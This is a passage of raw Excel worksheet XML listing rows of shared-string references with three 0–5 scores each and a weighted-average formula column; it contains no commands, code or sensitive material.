        <v>4.5999999999999996</v>
      </c>
    </row>
    <row r="27" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A27" s="13" t="s">
        <v>2935</v>
      </c>
      <c r="B27" s="13" t="s">
        <v>2937</v>
      </c>
      <c r="C27" s="14">
        <v>0</v>
      </c>
      <c r="D27" s="14">
        <v>0</v>
      </c>
      <c r="E27" s="14">
        <v>0</v>
      </c>
      <c r="F27" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="28" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A28" s="13" t="s">
        <v>2935</v>
      </c>
      <c r="B28" s="13" t="s">
        <v>2938</v>
      </c>
      <c r="C28" s="14">
        <v>5</v>
      </c>
      <c r="D28" s="14">
        <v>4</v>
      </c>
      <c r="E28" s="14">
        <v>5</v>
      </c>
      <c r="F28" s="32">
        <f t="shared" si="0"/>
        <v>4.8</v>
      </c>
    </row>
    <row r="29" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A29" s="13" t="s">
        <v>2939</v>
      </c>
      <c r="B29" s="13" t="s">
        <v>2910</v>
      </c>
      <c r="C29" s="14">
        <v>0</v>
      </c>
      <c r="D29" s="14">
        <v>0</v>
      </c>
      <c r="E29" s="14">
        <v>0</v>
      </c>
      <c r="F29" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="30" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A30" s="13" t="s">
        <v>2940</v>
      </c>
      <c r="B30" s="13" t="s">
        <v>2910</v>
      </c>
      <c r="C30" s="14">
        <v>0</v>
      </c>
      <c r="D30" s="14">
        <v>0</v>
      </c>
      <c r="E30" s="14">
        <v>0</v>
      </c>
      <c r="F30" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="31" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A31" s="13" t="s">
        <v>2941</v>
      </c>
      <c r="B31" s="13" t="s">
        <v>2910</v>
      </c>
      <c r="C31" s="14">
        <v>0</v>
      </c>
      <c r="D31" s="14">
        <v>0</v>
      </c>
      <c r="E31" s="14">
        <v>0</v>
      </c>
      <c r="F31" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="32" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A32" s="13" t="s">
        <v>16</v>
      </c>
      <c r="B32" s="13" t="s">
        <v>2942</v>
      </c>
      <c r="C32" s="14">
        <v>0</v>
      </c>
      <c r="D32" s="14">
        <v>0</v>
      </c>
      <c r="E32" s="14">
        <v>0</v>
      </c>
      <c r="F32" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="33" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A33" s="13" t="s">
        <v>16</v>
      </c>
      <c r="B33" s="13" t="s">
        <v>2943</v>
      </c>
      <c r="C33" s="14">
        <v>2</v>
      </c>
      <c r="D33" s="14">
        <v>4</v>
      </c>
      <c r="E33" s="14">
        <v>5</v>
      </c>
      <c r="F33" s="32">
        <f t="shared" si="0"/>
        <v>3.6</v>
      </c>
    </row>
    <row r="34" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A34" s="13" t="s">
        <v>16</v>
      </c>
      <c r="B34" s="13" t="s">
        <v>2944</v>
      </c>
      <c r="C34" s="14">
        <v>2</v>
      </c>
      <c r="D34" s="14">
        <v>4</v>
      </c>
      <c r="E34" s="14">
        <v>5</v>
      </c>
      <c r="F34" s="32">
        <f t="shared" ref="F34:F65" si="1">((C34*2)+D34+(E34*2))/5</f>
        <v>3.6</v>
      </c>
    </row>
    <row r="35" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A35" s="13" t="s">
        <v>16</v>
      </c>
      <c r="B35" s="13" t="s">
        <v>2945</v>
      </c>
      <c r="C35" s="14">
        <v>2</v>
      </c>
      <c r="D35" s="14">
        <v>4</v>
      </c>
      <c r="E35" s="14">
        <v>5</v>
      </c>
      <c r="F35" s="32">
        <f t="shared" si="1"/>
        <v>3.6</v>
      </c>
    </row>
    <row r="36" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A36" s="13" t="s">
        <v>16</v>
      </c>
      <c r="B36" s="13" t="s">
        <v>2946</v>
      </c>
      <c r="C36" s="14">
        <v>0</v>
      </c>
      <c r="D36" s="14">
        <v>0</v>
      </c>
      <c r="E36" s="14">
        <v>0</v>
      </c>
      <c r="F36" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="37" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A37" s="13" t="s">
        <v>16</v>
      </c>
      <c r="B37" s="13" t="s">
        <v>2947</v>
      </c>
      <c r="C37" s="14">
        <v>0</v>
      </c>
      <c r="D37" s="14">
        <v>0</v>
      </c>
      <c r="E37" s="14">
        <v>0</v>
      </c>
      <c r="F37" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="38" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A38" s="13" t="s">
        <v>16</v>
      </c>
      <c r="B38" s="13" t="s">
        <v>2948</v>
      </c>
      <c r="C38" s="14">
        <v>0</v>
      </c>
      <c r="D38" s="14">
        <v>0</v>
      </c>
      <c r="E38" s="14">
        <v>0</v>
      </c>
      <c r="F38" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="39" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A39" s="13" t="s">
        <v>2949</v>
      </c>
      <c r="B39" s="13" t="s">
        <v>2910</v>
      </c>
      <c r="C39" s="14">
        <v>0</v>
      </c>
      <c r="D39" s="14">
        <v>0</v>
      </c>
      <c r="E39" s="14">
        <v>0</v>
      </c>
      <c r="F39" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="40" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A40" s="13" t="s">
        <v>2950</v>
      </c>
      <c r="B40" s="13" t="s">
        <v>2951</v>
      </c>
      <c r="C40" s="14">
        <v>3</v>
      </c>
      <c r="D40" s="14">
        <v>5</v>
      </c>
      <c r="E40" s="14">
        <v>5</v>
      </c>
      <c r="F40" s="32">
        <f t="shared" si="1"/>
        <v>4.2</v>
      </c>
    </row>
    <row r="41" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A41" s="13" t="s">
        <v>2950</v>
      </c>
      <c r="B41" s="13" t="s">
        <v>2952</v>
      </c>
      <c r="C41" s="14">
        <v>0</v>
      </c>
      <c r="D41" s="14">
        <v>0</v>
      </c>
      <c r="E41" s="14">
        <v>0</v>
      </c>
      <c r="F41" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="42" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A42" s="13" t="s">
        <v>2953</v>
      </c>
      <c r="B42" s="13" t="s">
        <v>2934</v>
      </c>
      <c r="C42" s="14">
        <v>3</v>
      </c>
      <c r="D42" s="14">
        <v>5</v>
      </c>
      <c r="E42" s="14">
        <v>5</v>
      </c>
      <c r="F42" s="32">
        <f t="shared" si="1"/>
        <v>4.2</v>
      </c>
    </row>
    <row r="43" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A43" s="13" t="s">
        <v>2954</v>
      </c>
      <c r="B43" s="13"/>
      <c r="C43" s="14">
        <v>0</v>
      </c>
      <c r="D43" s="14">
        <v>0</v>
      </c>
      <c r="E43" s="14">
        <v>0</v>
      </c>
      <c r="F43" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="44" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A44" s="13" t="s">
        <v>2955</v>
      </c>
      <c r="B44" s="13" t="s">
        <v>2928</v>
      </c>
      <c r="C44" s="14">
        <v>0</v>
      </c>
      <c r="D44" s="14">
        <v>0</v>
      </c>
      <c r="E44" s="14">
        <v>0</v>
      </c>
      <c r="F44" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="45" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A45" s="45" t="s">
        <v>2955</v>
      </c>
      <c r="B45" s="45" t="s">
        <v>2956</v>
      </c>
      <c r="C45" s="14">
        <v>3</v>
      </c>
      <c r="D45" s="14">
        <v>3</v>
      </c>
      <c r="E45" s="14">
        <v>5</v>
      </c>
      <c r="F45" s="32">
        <f t="shared" si="1"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="46" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A46" s="13" t="s">
        <v>2957</v>
      </c>
      <c r="B46" s="13" t="s">
        <v>2910</v>
      </c>
      <c r="C46" s="14">
        <v>0</v>
      </c>
      <c r="D46" s="14">
        <v>0</v>
      </c>
      <c r="E46" s="14">
        <v>0</v>
      </c>
      <c r="F46" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="47" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A47" s="13" t="s">
        <v>2958</v>
      </c>
      <c r="B47" s="13" t="s">
        <v>2959</v>
      </c>
      <c r="C47" s="14">
        <v>5</v>
      </c>
      <c r="D47" s="14">
        <v>5</v>
      </c>
      <c r="E47" s="14">
        <v>5</v>
      </c>
      <c r="F47" s="32">
        <f t="shared" si="1"/>
        <v>5</v>
      </c>
    </row>
    <row r="48" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A48" s="13" t="s">
        <v>2958</v>
      </c>
      <c r="B48" s="13" t="s">
        <v>2960</v>
      </c>
      <c r="C48" s="14">
        <v>0</v>
      </c>
      <c r="D48" s="14">
        <v>0</v>
      </c>
      <c r="E48" s="14">
        <v>0</v>
      </c>
      <c r="F48" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="49" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A49" s="13" t="s">
        <v>2961</v>
      </c>
      <c r="B49" s="13" t="s">
        <v>2910</v>
      </c>
      <c r="C49" s="14">
        <v>0</v>
      </c>
      <c r="D49" s="14">
        <v>0</v>
      </c>
      <c r="E49" s="14">
        <v>0</v>
      </c>
      <c r="F49" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="50" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A50" s="13" t="s">
        <v>2962</v>
      </c>
      <c r="B50" s="13" t="s">
        <v>2963</v>
      </c>
      <c r="C50" s="14">
        <v>0</v>
      </c>
      <c r="D50" s="14">
        <v>0</v>
      </c>
      <c r="E50" s="14">
        <v>0</v>
      </c>
      <c r="F50" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="51" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A51" s="13" t="s">
        <v>2964</v>
      </c>
      <c r="B51" s="13"/>
      <c r="C51" s="14">
        <v>0</v>
      </c>
      <c r="D51" s="14">
        <v>0</v>
      </c>
      <c r="E51" s="14">
        <v>0</v>
      </c>
      <c r="F51" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="52" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A52" s="13" t="s">
        <v>2965</v>
      </c>
      <c r="B52" s="13" t="s">
        <v>2966</v>
      </c>
      <c r="C52" s="14">
        <v>5</v>
      </c>
      <c r="D52" s="14">
        <v>5</v>
      </c>
      <c r="E52" s="14">
        <v>5</v>
      </c>
      <c r="F52" s="32">
        <f t="shared" si="1"/>
        <v>5</v>
      </c>
    </row>
    <row r="53" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A53" s="13" t="s">
        <v>2965</v>
      </c>
      <c r="B53" s="13" t="s">
        <v>2967</v>
      </c>
      <c r="C53" s="14">
        <v>4</v>
      </c>
      <c r="D53" s="14">
        <v>4</v>
      </c>
      <c r="E53" s="14">
        <v>5</v>
      </c>
      <c r="F53" s="32">
        <f t="shared" si="1"/>
        <v>4.4000000000000004</v>
      </c>
    </row>
    <row r="54" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A54" s="13" t="s">
        <v>2968</v>
      </c>
      <c r="B54" s="13"/>
      <c r="C54" s="14">
        <v>0</v>
      </c>
      <c r="D54" s="14">
        <v>0</v>
      </c>
      <c r="E54" s="14">
        <v>0</v>
      </c>
      <c r="F54" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="55" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A55" s="13" t="s">
        <v>2969</v>
      </c>
      <c r="B55" s="13"/>
      <c r="C55" s="14">
        <v>0</v>
      </c>
      <c r="D55" s="14">
        <v>0</v>
      </c>
      <c r="E55" s="14">
        <v>0</v>
      </c>
      <c r="F55" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="56" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A56" s="13" t="s">
        <v>1228</v>
      </c>
      <c r="B56" s="13"/>
      <c r="C56" s="14">
        <v>0</v>
      </c>
      <c r="D56" s="14">
        <v>0</v>
      </c>
      <c r="E56" s="14">
        <v>0</v>
      </c>
      <c r="F56" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="57" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A57" s="13" t="s">
        <v>2970</v>
      </c>
      <c r="B57" s="13"/>
      <c r="C57" s="14">
        <v>0</v>
      </c>
      <c r="D57" s="14">
        <v>0</v>
      </c>
      <c r="E57" s="14">
        <v>0</v>
      </c>
      <c r="F57" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="58" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A58" s="13" t="s">
        <v>2971</v>
      </c>
      <c r="B58" s="13" t="s">
        <v>2972</v>
      </c>
      <c r="C58" s="14">
        <v>0</v>
      </c>
      <c r="D58" s="14">
        <v>0</v>
      </c>
      <c r="E58" s="14">
        <v>0</v>
      </c>
      <c r="F58" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="59" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A59" s="13" t="s">
        <v>2973</v>
      </c>
      <c r="B59" s="13" t="s">
        <v>2974</v>
      </c>
      <c r="C59" s="14">
        <v>0</v>
      </c>
      <c r="D59" s="14">
        <v>0</v>
      </c>
      <c r="E59" s="14">
        <v>0</v>
      </c>
      <c r="F59" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="60" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A60" s="13" t="s">
        <v>2973</v>
      </c>
      <c r="B60" s="13" t="s">
        <v>2975</v>
      </c>
      <c r="C60" s="14">
        <v>0</v>
      </c>
      <c r="D60" s="14">
        <v>0</v>
      </c>
      <c r="E60" s="14">
        <v>0</v>
      </c>
      <c r="F60" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="61" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A61" s="13" t="s">
        <v>2976</v>
      </c>
      <c r="B61" s="13" t="s">
        <v>2977</v>
      </c>
      <c r="C61" s="14">
        <v>1</v>
      </c>
      <c r="D61" s="14">
        <v>1</v>
      </c>
      <c r="E61" s="14">
        <v>1</v>
      </c>
      <c r="F61" s="32">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
    </row>
    <row r="62" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A62" s="13" t="s">
        <v>2976</v>
      </c>
      <c r="B62" s="13" t="s">
        <v>2978</v>
      </c>
      <c r="C62" s="14">
        <v>5</v>
      </c>
      <c r="D62" s="14">
        <v>5</v>
      </c>
      <c r="E62" s="14">
        <v>5</v>
      </c>
      <c r="F62" s="32">
        <f t="shared" si="1"/>
        <v>5</v>
      </c>
    </row>
    <row r="63" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A63" s="13" t="s">
        <v>2976</v>
      </c>
      <c r="B63" s="13" t="s">
        <v>2977</v>
      </c>
      <c r="C63" s="14">
        <v>1</v>
      </c>
      <c r="D63" s="14">
        <v>1</v>
      </c>
      <c r="E63" s="14">
        <v>1</v>
      </c>
      <c r="F63" s="32">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
    </row>
    <row r="64" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A64" s="13" t="s">
        <v>589</v>
      </c>
      <c r="B64" s="13" t="s">
        <v>2977</v>
      </c>
      <c r="C64" s="14">
        <v>1</v>
      </c>
      <c r="D64" s="14">
        <v>1</v>
      </c>
      <c r="E64" s="14">
        <v>1</v>
      </c>
      <c r="F64" s="32">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
    </row>
    <row r="65" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A65" s="13" t="s">
        <v>589</v>
      </c>
      <c r="B65" s="13" t="s">
        <v>2979</v>
      </c>
      <c r="C65" s="14">
        <v>5</v>
      </c>
      <c r="D65" s="14">
        <v>5</v>
      </c>
      <c r="E65" s="14">
        <v>5</v>
      </c>
      <c r="F65" s="32">
        <f t="shared" si="1"/>
        <v>5</v>
      </c>
    </row>
    <row r="66" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A66" s="13" t="s">
        <v>589</v>
      </c>
      <c r="B66" s="13" t="s">
        <v>2978</v>
      </c>
      <c r="C66" s="14">
        <v>5</v>
      </c>
      <c r="D66" s="14">
        <v>5</v>
      </c>
      <c r="E66" s="14">
        <v>5</v>
      </c>
      <c r="F66" s="32">
        <f t="shared" ref="F66:F97" si="2">((C66*2)+D66+(E66*2))/5</f>
        <v>5</v>
      </c>
    </row>
    <row r="67" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A67" s="13" t="s">
        <v>589</v>
      </c>
      <c r="B67" s="13" t="s">
        <v>2980</v>
      </c>
      <c r="C67" s="14">
        <v>5</v>
      </c>
      <c r="D67" s="14">
        <v>5</v>
      </c>
      <c r="E67" s="14">
        <v>5</v>
      </c>
      <c r="F67" s="32">
        <f t="shared" si="2"/>
        <v>5</v>
      </c>
    </row>
    <row r="68" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A68" s="13" t="s">
        <v>589</v>
      </c>
      <c r="B68" s="13" t="s">
        <v>2981</v>
      </c>
      <c r="C68" s="14">
        <v>5</v>
      </c>
      <c r="D68" s="14">
        <v>5</v>
      </c>
      <c r="E68" s="14">
        <v>5</v>
      </c>
      <c r="F68" s="32">
        <f t="shared" si="2"/>
        <v>5</v>
      </c>
    </row>
    <row r="69" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A69" s="13" t="s">
        <v>589</v>
      </c>
      <c r="B69" s="13" t="s">
        <v>2982</v>
      </c>
      <c r="C69" s="14">
        <v>5</v>
      </c>
      <c r="D69" s="14">
        <v>5</v>
      </c>
      <c r="E69" s="14">
        <v>5</v>
      </c>
      <c r="F69" s="32">
        <f t="shared" si="2"/>
        <v>5</v>
      </c>
    </row>
    <row r="70" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A70" s="13" t="s">
        <v>589</v>
      </c>
      <c r="B70" s="13" t="s">
        <v>2983</v>
      </c>
      <c r="C70" s="14">
        <v>0</v>
      </c>
      <c r="D70" s="14">
        <v>0</v>
      </c>
      <c r="E70" s="14">
        <v>0</v>
      </c>
      <c r="F70" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="71" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A71" s="13" t="s">
        <v>589</v>
      </c>
      <c r="B71" s="13" t="s">
        <v>2984</v>
      </c>
      <c r="C71" s="14">
        <v>0</v>
      </c>
      <c r="D71" s="14">
        <v>0</v>
      </c>
      <c r="E71" s="14">
        <v>0</v>
      </c>
      <c r="F71" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="72" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A72" s="13" t="s">
        <v>2985</v>
      </c>
      <c r="B72" s="13" t="s">
        <v>2986</v>
      </c>
      <c r="C72" s="14">
        <v>1</v>
      </c>
      <c r="D72" s="14">
        <v>5</v>
      </c>
      <c r="E72" s="14">
        <v>1</v>
      </c>
      <c r="F72" s="32">
        <f t="shared" si="2"/>
        <v>1.8</v>
      </c>
    </row>
    <row r="73" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A73" s="13" t="s">
        <v>2985</v>
      </c>
      <c r="B73" s="13" t="s">
        <v>2987</v>
      </c>
      <c r="C73" s="14">
        <v>5</v>
      </c>
      <c r="D73" s="14">
        <v>4</v>
      </c>
      <c r="E73" s="14">
        <v>5</v>
      </c>
      <c r="F73" s="32">
        <f t="shared" si="2"/>
        <v>4.8</v>
      </c>
    </row>
    <row r="74" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A74" s="13" t="s">
        <v>2985</v>
      </c>
      <c r="B74" s="13" t="s">
        <v>2959</v>
      </c>
      <c r="C74" s="14">
        <v>5</v>
      </c>
      <c r="D74" s="14">
        <v>4</v>
      </c>
      <c r="E74" s="14">
        <v>5</v>
      </c>
      <c r="F74" s="32">
        <f t="shared" si="2"/>
        <v>4.8</v>
      </c>
    </row>
    <row r="75" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A75" s="13" t="s">
        <v>2985</v>
      </c>
      <c r="B75" s="13" t="s">
        <v>2960</v>
      </c>
      <c r="C75" s="14">
        <v>5</v>
      </c>
      <c r="D75" s="14">
        <v>4</v>
      </c>
      <c r="E75" s="14">
        <v>5</v>
      </c>
      <c r="F75" s="32">
        <f t="shared" si="2"/>
        <v>4.8</v>
      </c>
    </row>
    <row r="76" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A76" s="13" t="s">
        <v>2985</v>
      </c>
      <c r="B76" s="13" t="s">
        <v>2988</v>
      </c>
      <c r="C76" s="14">
        <v>0</v>
      </c>
      <c r="D76" s="14">
        <v>0</v>
      </c>
      <c r="E76" s="14">
        <v>0</v>
      </c>
      <c r="F76" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="77" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A77" s="13" t="s">
        <v>2985</v>
      </c>
      <c r="B77" s="13" t="s">
        <v>2989</v>
      </c>
      <c r="C77" s="14">
        <v>0</v>
      </c>
      <c r="D77" s="14">
        <v>0</v>
      </c>
      <c r="E77" s="14">
        <v>0</v>
      </c>
      <c r="F77" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="78" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A78" s="13" t="s">
        <v>2985</v>
      </c>
      <c r="B78" s="13" t="s">
        <v>2990</v>
      </c>
      <c r="C78" s="14">
        <v>0</v>
      </c>
      <c r="D78" s="14">
        <v>0</v>
      </c>
      <c r="E78" s="14">
        <v>0</v>
      </c>
      <c r="F78" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="79" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A79" s="13" t="s">
        <v>2985</v>
      </c>
      <c r="B79" s="13" t="s">
        <v>2991</v>
      </c>
      <c r="C79" s="14">
        <v>0</v>
      </c>
      <c r="D79" s="14">
        <v>0</v>
      </c>
      <c r="E79" s="14">
        <v>0</v>
      </c>
      <c r="F79" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="80" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A80" s="13" t="s">
        <v>2985</v>
      </c>
      <c r="B80" s="13" t="s">
        <v>2992</v>
      </c>
      <c r="C80" s="14">
        <v>0</v>
      </c>
      <c r="D80" s="14">
        <v>0</v>
      </c>
      <c r="E80" s="14">
        <v>0</v>
      </c>
      <c r="F80" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="81" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A81" s="13" t="s">
        <v>2985</v>
      </c>
      <c r="B81" s="13" t="s">
        <v>2993</v>
      </c>
      <c r="C81" s="14">
        <v>0</v>
      </c>
      <c r="D81" s="14">
        <v>0</v>
      </c>
      <c r="E81" s="14">
        <v>0</v>
      </c>
      <c r="F81" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="82" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A82" s="13" t="s">
        <v>2994</v>
      </c>
      <c r="B82" s="13" t="s">
        <v>2995</v>
      </c>
      <c r="C82" s="14">
        <v>5</v>
      </c>
      <c r="D82" s="14">
        <v>5</v>
      </c>
      <c r="E82" s="14">
        <v>5</v>
      </c>
      <c r="F82" s="32">
        <f t="shared" si="2"/>
        <v>5</v>
      </c>
    </row>
    <row r="83" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A83" s="13" t="s">
        <v>2994</v>
      </c>
      <c r="B83" s="13" t="s">
        <v>2996</v>
      </c>
      <c r="C83" s="14">
        <v>5</v>
      </c>
      <c r="D83" s="14">
        <v>5</v>
      </c>
      <c r="E83" s="14">
        <v>5</v>
      </c>
      <c r="F83" s="32">
        <f t="shared" si="2"/>
        <v>5</v>
      </c>
    </row>
    <row r="84" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A84" s="13" t="s">
        <v>2994</v>
      </c>
      <c r="B84" s="13" t="s">
        <v>2997</v>
      </c>
      <c r="C84" s="14">
        <v>1</v>
      </c>
      <c r="D84" s="14">
        <v>5</v>
      </c>
      <c r="E84" s="14">
        <v>5</v>
      </c>
      <c r="F84" s="32">
        <f t="shared" si="2"/>
        <v>3.4</v>
      </c>
    </row>
    <row r="85" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A85" s="13" t="s">
        <v>2994</v>
      </c>
      <c r="B85" s="13" t="s">
        <v>2998</v>
      </c>
      <c r="C85" s="14">
        <v>0</v>
      </c>
      <c r="D85" s="14">
        <v>0</v>
      </c>
      <c r="E85" s="14">
        <v>0</v>
      </c>
      <c r="F85" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="86" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A86" s="13" t="s">
        <v>2994</v>
      </c>
      <c r="B86" s="13" t="s">
        <v>2999</v>
      </c>
      <c r="C86" s="14">
        <v>0</v>
      </c>
      <c r="D86" s="14">
        <v>0</v>
      </c>
      <c r="E86" s="14">
        <v>0</v>
      </c>
      <c r="F86" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="87" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A87" s="13" t="s">
        <v>3000</v>
      </c>
      <c r="B87" s="13" t="s">
        <v>3001</v>
      </c>
      <c r="C87" s="14">
        <v>0</v>
      </c>
      <c r="D87" s="14">
        <v>0</v>
      </c>
      <c r="E87" s="14">
        <v>0</v>
      </c>
      <c r="F87" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="88" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A88" s="13" t="s">
        <v>3000</v>
      </c>
      <c r="B88" s="13" t="s">
        <v>3002</v>
      </c>
      <c r="C88" s="14">
        <v>0</v>
      </c>
      <c r="D88" s="14">
        <v>0</v>
      </c>
      <c r="E88" s="14">
        <v>0</v>
      </c>
      <c r="F88" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="89" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A89" s="13" t="s">
        <v>3000</v>
      </c>
      <c r="B89" s="13" t="s">
        <v>3003</v>
      </c>
      <c r="C89" s="14">
        <v>0</v>
      </c>
      <c r="D89" s="14">
        <v>0</v>
      </c>
      <c r="E89" s="14">
        <v>0</v>
      </c>
      <c r="F89" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="90" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A90" s="13" t="s">
        <v>3004</v>
      </c>
      <c r="B90" s="13" t="s">
        <v>3005</v>
      </c>
      <c r="C90" s="14">
        <v>4</v>
      </c>
      <c r="D90" s="14">
        <v>5</v>
      </c>
      <c r="E90" s="14">
        <v>5</v>
      </c>
      <c r="F90" s="32">
        <f t="shared" si="2"/>
        <v>4.5999999999999996</v>
      </c>
    </row>
    <row r="91" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A91" s="13" t="s">
        <v>3004</v>
      </c>
      <c r="B91" s="13" t="s">
        <v>3006</v>
      </c>
      <c r="C91" s="14">
        <v>0</v>
      </c>
      <c r="D91" s="14">
        <v>0</v>
      </c>
      <c r="E91" s="14">
        <v>0</v>
      </c>
      <c r="F91" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="92" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A92" s="45" t="s">
        <v>3007</v>
      </c>
      <c r="B92" s="13"/>
      <c r="C92" s="14">
        <v>0</v>
      </c>
      <c r="D92" s="14">
        <v>0</v>
      </c>
      <c r="E92" s="14">
        <v>0</v>
      </c>
      <c r="F92" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="93" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A93" s="45" t="s">
        <v>1018</v>
      </c>
      <c r="B93" s="13" t="s">
        <v>2910</v>
      </c>
      <c r="C93" s="14">
        <v>0</v>
      </c>
      <c r="D93" s="14">
        <v>0</v>
      </c>
      <c r="E93" s="14">
        <v>0</v>
      </c>
      <c r="F93" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="94" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A94" s="45" t="s">
        <v>3008</v>
      </c>
      <c r="B94" s="13" t="s">
        <v>2910</v>
      </c>
      <c r="C94" s="14">
        <v>0</v>
      </c>
      <c r="D94" s="14">
